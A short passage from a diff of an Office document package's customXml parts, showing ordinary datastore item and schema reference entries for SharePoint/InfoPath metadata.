+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
+    <ds:schemaRef ds:uri="2c71b88f-36ae-449a-8a52-10e2658bdd67"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
+</file>
+
 <file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{C30AA391-316B-4E95-AE8C-64681E201677}">
   <ds:schemaRefs>
